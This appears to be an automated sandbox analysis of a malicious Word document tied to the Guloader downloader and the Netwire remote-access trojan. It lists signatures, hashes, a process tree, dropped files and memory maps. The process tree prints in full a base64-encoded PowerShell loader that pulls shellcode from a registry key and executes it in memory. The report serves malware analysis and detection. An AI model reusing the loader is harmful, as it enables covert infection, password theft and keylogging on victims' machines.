Analysis

  • max time kernel
    1779s
  • max time network
    1797s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    05-07-2022 17:13

General

  • Target

    statement_gateCSV0902221-22-10.doc

  • Size

    548KB

  • MD5

    b0f5d6be788659aad5a859d61af1ba94

  • SHA1

    daa8f29996e3bbc742d1d914befb0edc67057290

  • SHA256

    434720a8844eb8f5f8f6eb6323c53a7776d3979a52c4214d1c2b0a4331db9ad0

  • SHA512

    dafdffafe50cf43616b98fce60c8e507dcd2a93a599d18142d4c40cec523c1800679ced2af43e8faa2f7f3a970e011918dca595e6f6352796d6447692aea670c

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\statement_gateCSV0902221-22-10.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:1276
  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\bilb.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2396
    • C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAHIAbQBtAGUAYwBlACAAVABpAGQAcwBmAG8AcgBzAGkANQAgAGUAcQB1AGEAbAAgAHMAcABpAGQAbgAgAEYAQQBMAEQASABKACAAUwBUAEEAVQBOAEMAIABEAEEATgBHAEwARQAgAFQAeQBuAGQAcwBsAGkANgAgAFIAZQBtAHIAOAAgAEUAawBzAGkAIABOAG8AcgBkAGgAYQB2AG4AZQBuACAAZwBlAG4AawAgAHMAYwBoAHcAZQBpACAAaQBuAGQAZwByAGEAdgBlAGQAZQAgAFUAcgB0AGUAcwB1ACAATQB5AHgAbwAgAFMAbwBuAGEAbgB0ACAAVQBNAE8AUgBBAEwASQAgAEIAVQBTAEwASQBOACAAbwB2AGUAcgBsAGEAdQAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGwAYQBuAGcAcwB2AHIAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQQBjAGEAcwBhACgAaQBuAHQAIABsAGEAbgBnAHMAdgByADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAZQBhAGMALABpAG4AdAAgAFMAaABpAG4AOQAsAHIAZQBmACAASQBuAHQAMwAyACAAbABhAG4AZwBzAHYAcgAsAGkAbgB0ACAAcwBlAGMAZQByAG4AZQAsAGkAbgB0ACAAbABhAG4AZwBzAHYAcgA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBBACgAdQBpAG4AdAAgAFMAaABpAG4AOQA1ACwAaQBuAHQAIABTAGgAaQBuADkANgAsAGkAbgB0ACAAUwBoAGkAbgA5ADcALABpAG4AdAAgAFMAaABpAG4AOQA4ACwAaQBuAHQAIABTAGgAaQBuADkAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABTAGgAaQBuADkAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBoAGkAbgA5ADIALABpAG4AdAAgAFMAaABpAG4AOQAzACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHMAZQBkAGEAdABpAHYAZQAgAEEAUwBTAEUAUwBTAE8AUgBTAEgAIABEAGUAaQBuAHMAIABiAG8AdABhAG4AaQBzAGsAZQB2ACAATgBBAFQASABPACAATgBhAHQAaQBvAG4AYQBsADgAIABuAHkAdAB0AGkAZwAgAEcAeQBkAGUAcABsADkAIABLAGkAYwBrAG8AdQB0AHIAZQBzADMAIABWAEEAUgBBAE4AIABkAGkAbQBlACAAQgBhAG4AZQBnAGEAYQByADUAIABjAGUAbQBiACAAVAB5AHAAZQBjAGgAZQBjAGsAOQAgAEYAbwByAGUAYgB5AGcAZwBlACAAYwByAGUAcAB5AHMAbAB2ACAATQBhAGgAbwBpAHQAcgBlAG8AcAAyACAAUABvAGwAeQBwAGwAYQBzACAATgBBAFQASQBPAE4AQQBMAE0AIABSAGIAYQByAGUANAAgAFkAcABzAGkANwAgAHMAdABpAHYAZgByACAAQwBhAHkAbQA0ACAAbABpAG4AagBlAHIAaQBuAGcAIAB4AGUAcgBvAHMAZQBzAGsAbwAgACAADQAKACQAbABhAG4AZwBzAHYAcgAzAD0AMAA7AA0ACgAkAGwAYQBuAGcAcwB2AHIAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABsAGEAbgBnAHMAdgByADgAPQBbAGwAYQBuAGcAcwB2AHIAMQBdADoAOgBBAGMAYQBzAGEAKAAtADEALABbAHIAZQBmAF0AJABsAGEAbgBnAHMAdgByADMALAAwACwAWwByAGUAZgBdACQAbABhAG4AZwBzAHYAcgA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAUwBjAGEAYgBpAD0AKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAEkATgBJAE0AIgApAC4AUwB1AG4AZAByAA0ACgANAAoAJABEAGUAdABlAGsAdABlAHIAZQBkADcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAFMAYwBhAGIAaQAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBjAGEAYgBpAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEQAZQB0AGUAawB0AGUAcgBlAGQANwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAYwBhAGIAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEMAcgBlAG4AOAA9ADAAOwAgACQAQwByAGUAbgA4ACAALQBsAHQAIAAkAEQAZQB0AGUAawB0AGUAcgBlAGQANwAuAGMAbwB1AG4AdAAgADsAIAAkAEMAcgBlAG4AOAArACsAKQANAAoAewANAAoACQANAAoAWwBsAGEAbgBnAHMAdgByADEAXQA6ADoAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoACQAbABhAG4AZwBzAHYAcgAzACsAJABDAHIAZQBuADgALABbAHIAZQBmAF0AJABEAGUAdABlAGsAdABlAHIAZQBkADcAWwAkAEMAcgBlAG4AOABdACwAMQApAA0ACgANAAoAfQANAAoAWwBsAGEAbgBnAHMAdgByADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAEEAKAAkAGwAYQBuAGcAcwB2AHIAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="
      2⤵
      • Checks QEMU agent file
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1408
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0d50k31\d0d50k31.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3492
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC94.tmp" "c:\Users\Admin\AppData\Local\Temp\d0d50k31\CSC51BEBFFF24EC4774BE549B17CDE086A.TMP"
          4⤵
            PID:1444
        • C:\Program Files (x86)\internet explorer\ieinstal.exe
          "C:\Program Files (x86)\internet explorer\ieinstal.exe"
          3⤵
          • Checks QEMU agent file
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          PID:3484

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESBC94.tmp

      Filesize

      1KB

      MD5

      6f2ea8bd00bf06f1efd682adf731503b

      SHA1

      62657d9fbb82b5b6de082f427feb5893da192598

      SHA256

      11d81f663b005bc7ad459ca7656ab5d4090723591c9f6b3c84b3db02eb1a8906

      SHA512

      295055a1c74f9221b7fde0a557707efad9201ac1246c8bc998bd0bc870ce221f79c07356301bbec38fe0634c926d1e17438ff07c3b4ece6100833807fd14517a

    • C:\Users\Admin\AppData\Local\Temp\d0d50k31\d0d50k31.dll

      Filesize

      3KB

      MD5

      11fc485435be1ea7ee28a6077fe372a0

      SHA1

      2c1e627a9c7736bcac7d893da0fd8d3f32e09fe6

      SHA256

      67d362ae8488bdd4b0704022590c3944ac74f2f4e23295ffdfa930ac6200f5c0

      SHA512

      23e5f665d8eae48d45265c011d2e5c3c0475bb82b9cce94bee11970133445d64b251e1bd84829fab46f55ccbfaa99087ae2f689bcfe7c120a2f472349fd488fd

    • C:\Users\Admin\Desktop\bilb.vbs

      Filesize

      248KB

      MD5

      c5517debb620db30d9d540e8c8c2b136

      SHA1

      314fd5ff832ef2ad1e8a9ec9b51df2410d492968

      SHA256

      a442bd2d1014b15a32d8113d78a4d7b3843d7af28981cd842348cbd3ffd11fc5

      SHA512

      3f65c1fd7d5bd15dfd456b2dbcc22fb153a0c7f4274d454bbff93c985930217307e72c133cb63d47199138c2ee47cca0252874b790ad9d8f616b6234e527ea3a

    • \??\c:\Users\Admin\AppData\Local\Temp\d0d50k31\CSC51BEBFFF24EC4774BE549B17CDE086A.TMP

      Filesize

      652B

      MD5

      32ef86b4e3d5e2bc7cfe17de4550620b

      SHA1

      d46d34eeee86f3056ee14c21e3af96404a234c29

      SHA256

      64a2ce6099994f046adfbf8c451ec171eed0af301336807d3062b9f1b47d6c27

      SHA512

      094dc5001b43e53cc204bd81895e55ba6c6a51cec32f9b63cf64bd2ce7669d1ad9a5a72feb5d019ae1544477a55651f5873116c3a9219af9b511013a9cc49ead

    • \??\c:\Users\Admin\AppData\Local\Temp\d0d50k31\d0d50k31.0.cs

      Filesize

      508B

      MD5

      92f532cb0b2fde496d0062039e781562

      SHA1

      e2dc5e937dd8ffeca772d4c9faf0b5dbbbdb6002

      SHA256

      8e5e474123610d866a81d72dddc961867243d18c18c4fc77ae34fded295ee8e6

      SHA512

      e7747046ea788c2ae010f32b6336ceb708b165fe06fe8caa94c93106b9491595e0507aa88c3379bbbc7f4df8c0212a7e92e578bb8a92e27fc9967510536d6cc0

    • \??\c:\Users\Admin\AppData\Local\Temp\d0d50k31\d0d50k31.cmdline

      Filesize

      369B

      MD5

      1e36f866ef6c2c9485d3ca3fb7948c62

      SHA1

      ab0f22ddca280bc00a200bea77d7ac49dafbbebb

      SHA256

      36f9e59b6c9f152047289f0719d4ff93cd9b298d5ed9ac867688ccbba49bdf66

      SHA512

      246fa4fd0fadb9a90903df5de911a96de82dfd349d8a27dd3a92df3c2b54dceed5a5436e6ed450b382785036765ba3ba45cfdbb7583dd3c3281b17401e53df63

    • memory/1276-117-0x00007FFE6B3E0000-0x00007FFE6B3F0000-memory.dmp

      Filesize

      64KB

    • memory/1276-118-0x00007FFE6B3E0000-0x00007FFE6B3F0000-memory.dmp

      Filesize

      64KB

    • memory/1276-119-0x00007FFE6B3E0000-0x00007FFE6B3F0000-memory.dmp

      Filesize

      64KB

    • memory/1276-120-0x00007FFE6B3E0000-0x00007FFE6B3F0000-memory.dmp

      Filesize

      64KB

    • memory/1276-123-0x00007FFE67870000-0x00007FFE67880000-memory.dmp

      Filesize

      64KB

    • memory/1276-126-0x00007FFE67870000-0x00007FFE67880000-memory.dmp

      Filesize

      64KB

    • memory/1408-385-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-392-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-349-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-350-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-351-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-352-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-354-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-353-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-355-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-356-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-357-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-358-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-360-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-359-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-361-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-362-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-363-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-364-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-365-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-366-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-367-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-368-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-369-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-370-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-371-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-372-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-373-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-374-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-375-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-376-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-378-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-379-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-381-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-382-0x0000000004990000-0x00000000049C6000-memory.dmp

      Filesize

      216KB

    • memory/1408-383-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-384-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-347-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-386-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-387-0x00000000074A0000-0x0000000007AC8000-memory.dmp

      Filesize

      6.2MB

    • memory/1408-388-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-389-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-390-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-391-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-348-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-393-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-394-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-395-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-396-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-397-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-398-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-399-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-400-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-401-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-403-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-402-0x00000000073D0000-0x00000000073F2000-memory.dmp

      Filesize

      136KB

    • memory/1408-404-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-405-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-406-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-407-0x0000000007CA0000-0x0000000007D06000-memory.dmp

      Filesize

      408KB

    • memory/1408-408-0x0000000007E10000-0x0000000007E76000-memory.dmp

      Filesize

      408KB

    • memory/1408-409-0x0000000007E80000-0x00000000081D0000-memory.dmp

      Filesize

      3.3MB

    • memory/1408-410-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-411-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-412-0x0000000007BA0000-0x0000000007BBC000-memory.dmp

      Filesize

      112KB

    • memory/1408-413-0x00000000087D0000-0x000000000881B000-memory.dmp

      Filesize

      300KB

    • memory/1408-414-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-417-0x00000000084E0000-0x0000000008556000-memory.dmp

      Filesize

      472KB

    • memory/1408-428-0x0000000009C20000-0x000000000A298000-memory.dmp

      Filesize

      6.5MB

    • memory/1408-346-0x0000000000000000-mapping.dmp

    • memory/1408-429-0x0000000009340000-0x000000000935A000-memory.dmp

      Filesize

      104KB

    • memory/1408-491-0x0000000008310000-0x0000000008318000-memory.dmp

      Filesize

      32KB

    • memory/1408-496-0x00000000097C0000-0x0000000009854000-memory.dmp

      Filesize

      592KB

    • memory/1408-497-0x0000000009750000-0x0000000009772000-memory.dmp

      Filesize

      136KB

    • memory/1408-498-0x000000000A7A0000-0x000000000AC9E000-memory.dmp

      Filesize

      5.0MB

    • memory/1408-606-0x00000000095A0000-0x0000000009C18000-memory.dmp

      Filesize

      6.5MB

    • memory/1408-607-0x00000000095A0000-0x0000000009C18000-memory.dmp

      Filesize

      6.5MB

    • memory/1408-129258-0x00007FFEAB350000-0x00007FFEAB52B000-memory.dmp

      Filesize

      1.9MB

    • memory/1408-129260-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1408-136780-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/1444-469-0x0000000000000000-mapping.dmp

    • memory/3484-136762-0x0000000003200000-mapping.dmp

    • memory/3484-136910-0x0000000003200000-0x0000000003300000-memory.dmp

      Filesize

      1024KB

    • memory/3484-136911-0x0000000003200000-0x0000000003300000-memory.dmp

      Filesize

      1024KB

    • memory/3484-265031-0x00007FFEAB350000-0x00007FFEAB52B000-memory.dmp

      Filesize

      1.9MB

    • memory/3484-265032-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/3484-272715-0x0000000077700000-0x000000007788E000-memory.dmp

      Filesize

      1.6MB

    • memory/3492-430-0x0000000000000000-mapping.dmp